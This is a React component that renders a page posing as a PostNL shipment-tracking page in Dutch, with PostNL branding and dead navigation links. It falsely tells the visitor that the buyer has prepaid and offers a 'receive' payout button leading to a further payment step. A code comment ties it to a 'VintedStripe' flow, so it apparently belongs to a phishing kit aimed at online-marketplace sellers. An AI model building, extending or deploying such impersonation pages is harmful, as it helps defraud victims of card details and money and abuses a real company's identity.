import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './PostnlNlSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/postnl-nl-logo.svg`;

function noop(e) {
  e.preventDefault();
}

function IconSearch() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="10.5" cy="10.5" r="6.5" stroke="currentColor" strokeWidth="2" />
      <path d="M16 16l6 6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

function IconLaptop() {
  return (
    <svg className="postnl-ico" width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <rect x="3" y="4" width="18" height="12" rx="1.5" stroke="#1a2744" strokeWidth="1.5" />
      <path d="M2 18h20v1H2v-1z" fill="#1a2744" />
    </svg>
  );
}

function IconCard() {
  return (
    <svg className="postnl-ico" width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <rect x="2" y="5" width="20" height="14" rx="2" stroke="#1a2744" strokeWidth="1.5" />
      <path d="M2 10h20" stroke="#1a2744" strokeWidth="1.5" />
    </svg>
  );
}

function IconBanknote() {
  return (
    <svg className="postnl-cta-ico" width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <rect x="2" y="6" width="20" height="12" rx="2" fill="rgba(255,255,255,0.95)" stroke="#fff" strokeWidth="1" />
      <circle cx="12" cy="12" r="3" stroke="#635bff" strokeWidth="1.2" fill="none" />
    </svg>
  );
}

/**
 * PostNL NL — tracking + uitbetaling; «Ontvang …» → index2 (VintedStripe2).
 */
function PostnlNlSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [copyOk, setCopyOk] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'NL').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const amountDisplay = useMemo(() => {
    if (priceNumber == null) return '—';
    return new Intl.NumberFormat('nl-NL', {
      minimumFractionDigits: 0,
      maximumFractionDigits: 2,
    }).format(priceNumber);
  }, [priceNumber]);

  const trackId =
    (pageData?.unique_id && String(pageData.unique_id).trim()) ||
    (pageData?.page_code && String(pageData.page_code).trim()) ||
    pageCode ||
    '—';

  const recipient =
    [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const onCopy = () => {
    if (!trackId || trackId === '—') return;
    navigator.clipboard?.writeText(trackId).then(() => {
      setCopyOk(true);
      setTimeout(() => setCopyOk(false), 2000);
    });
  };

  if (loading && pageCode) {
    return (
      <div className="postnl-wrap" lang="nl">
        <div className="postnl-loading">Laden…</div>
        <div className="postnl-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="postnl-wrap" lang="nl">
      <header className="postnl-header">
        <div className="postnl-header-inner">
          <a href="#/" className="postnl-logo-link" onClick={noop} aria-label="PostNL">
            <img src={LOGO_SRC} alt="" className="postnl-logo" width={148} height={32} />
          </a>
          <nav className="postnl-nav-main" aria-label="Hoofdnavigatie">
            <a href="#/" onClick={noop}>
              Versturen <span className="postnl-chev" aria-hidden>▾</span>
            </a>
            <a href="#/" onClick={noop}>
              Ontvangen <span className="postnl-chev" aria-hidden>▾</span>
            </a>
            <a href="#/" onClick={noop}>
              Zakelijke Oplossingen <span className="postnl-chev" aria-hidden>▾</span>
            </a>
            <a href="#/" onClick={noop}>
              Webshop
            </a>
            <a href="#/" onClick={noop}>
              Service &amp; Contact
            </a>
          </nav>
          <div className="postnl-header-tools">
            <span className="postnl-lang">
              NL <span className="postnl-chev postnl-chev--sm" aria-hidden>▾</span>
            </span>
            <button type="button" className="postnl-login" onClick={noop}>
              Inloggen <span aria-hidden>▾</span>
            </button>
            <button type="button" className="postnl-search-btn" aria-label="Zoeken" onClick={noop}>
              <IconSearch />
            </button>
          </div>
        </div>
      </header>

      <main className="postnl-main">
        <div className="postnl-main-inner">
          <div className="postnl-track-title-row">
            <h1 className="postnl-h1">Zending tracking</h1>
            <div className="postnl-tabs" role="tablist">
              <span className="postnl-tab postnl-tab--active" role="tab" aria-selected="true">
                Tracking
              </span>
              <button type="button" className="postnl-tab" role="tab">
                FAQs
              </button>
            </div>
          </div>

          <div className="postnl-volgnr">
            <span className="postnl-volgnr-label">Volgnr:</span>
            <code className="postnl-volgnr-code">{trackId}</code>
            <button type="button" className="postnl-copy" onClick={onCopy}>
              {copyOk ? 'Gekopieerd' : 'Kopiëren'}
            </button>
          </div>

          <h2 className="postnl-h2">Zendingstatus</h2>
          <div className="postnl-status-card">
            <div className="postnl-status-row">
              <IconLaptop />
              <p>De pakketgegevens zijn in het PostNL-systeem ingevoerd.</p>
            </div>
            <div className="postnl-status-row">
              <IconCard />
              <p>Voorafbetaling gedaan door de ontvanger.</p>
            </div>
          </div>

          <Link to={index2Path} className="postnl-cta">
            <IconBanknote />
            <span>{priceNumber == null ? `Ontvang — ${sym}` : `Ontvang ${amountDisplay} ${sym}`}</span>
          </Link>

          <h2 className="postnl-h2 postnl-h2--section">Productinformatie</h2>
          <div className="postnl-info-grid">
            <div className="postnl-info-col">
              <div className="postnl-info-item">
                <span className="postnl-info-k">Leveringsadres:</span>
                <span className="postnl-info-v">{address}</span>
              </div>
              <div className="postnl-info-item">
                <span className="postnl-info-k">Naam van de ontvanger:</span>
                <span className="postnl-info-v">{recipient}</span>
              </div>
            </div>
            <div className="postnl-info-col">
              <div className="postnl-info-item">
                <span className="postnl-info-k">Kenmerken:</span>
                <span className="postnl-info-v">Betaling bij aflevering</span>
              </div>
              <div className="postnl-info-item">
                <span className="postnl-info-k">Te ontvangen:</span>
                <span className="postnl-info-v">{priceNumber == null ? `— ${sym}` : `${amountDisplay} ${sym}`}</span>
              </div>
            </div>
          </div>

          <section className="postnl-help">
            <h3 className="postnl-help-title">Meer hulp nodig?</h3>
            <p className="postnl-help-text">
              Neem contact op met de PostNL Tracking-ondersteuning voor verdere hulp.
            </p>
            <button type="button" className="postnl-faqs" onClick={noop}>
              FAQs
            </button>
          </section>
        </div>
      </main>

      <footer className="postnl-footer">
        <div className="postnl-footer-light">
          <div className="postnl-footer-grid">
            <div className="postnl-fcol">
              <h4>Direct regelen</h4>
              <a href="#/" onClick={noop}>
                Track &amp; trace
              </a>
              <a href="#/" onClick={noop}>
                Postcode zoeken
              </a>
              <a href="#/" onClick={noop}>
                Versturen
              </a>
              <a href="#/" onClick={noop}>
                PostNL-punten
              </a>
            </div>
            <div className="postnl-fcol">
              <h4>PostNL-app</h4>
              <a href="#/" onClick={noop}>
                iOS
              </a>
              <a href="#/" onClick={noop}>
                Android
              </a>
            </div>
            <div className="postnl-fcol">
              <h4>Hulp</h4>
              <a href="#/" onClick={noop}>
                Service en contact
              </a>
              <a href="#/" onClick={noop}>
                Privacy
              </a>
              <a href="#/" onClick={noop}>
                Cookies
              </a>
              <a href="#/" onClick={noop}>
                Algemene voorwaarden
              </a>
            </div>
            <div className="postnl-fcol">
              <h4>Over PostNL</h4>
              <a href="#/" onClick={noop}>
                Over PostNL
              </a>
              <a href="#/" onClick={noop}>
                Beleggers
              </a>
              <a href="#/" onClick={noop}>
                Pers en nieuws
              </a>
              <a href="#/" onClick={noop}>
                Werken bij PostNL
              </a>
            </div>
          </div>
        </div>
        <div className="postnl-footer-dark">
          <div className="postnl-footer-dark-inner">
            <div className="postnl-foot-brand">
              <img src={LOGO_SRC} alt="" className="postnl-foot-logo" width={120} height={26} />
              <span>© PostNL Holding B.V.</span>
            </div>
            <nav className="postnl-foot-legal" aria-label="Juridisch">
              <a href="#/" onClick={noop}>
                Privacy
              </a>
              <a href="#/" onClick={noop}>
                Cookies
              </a>
              <a href="#/" onClick={noop}>
                Gebruiksvoorwaarden
              </a>
              <a href="#/" onClick={noop}>
                Algemene Voorwaarden
              </a>
            </nav>
          </div>
        </div>
      </footer>

      <div className="postnl-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default PostnlNlSuccess;
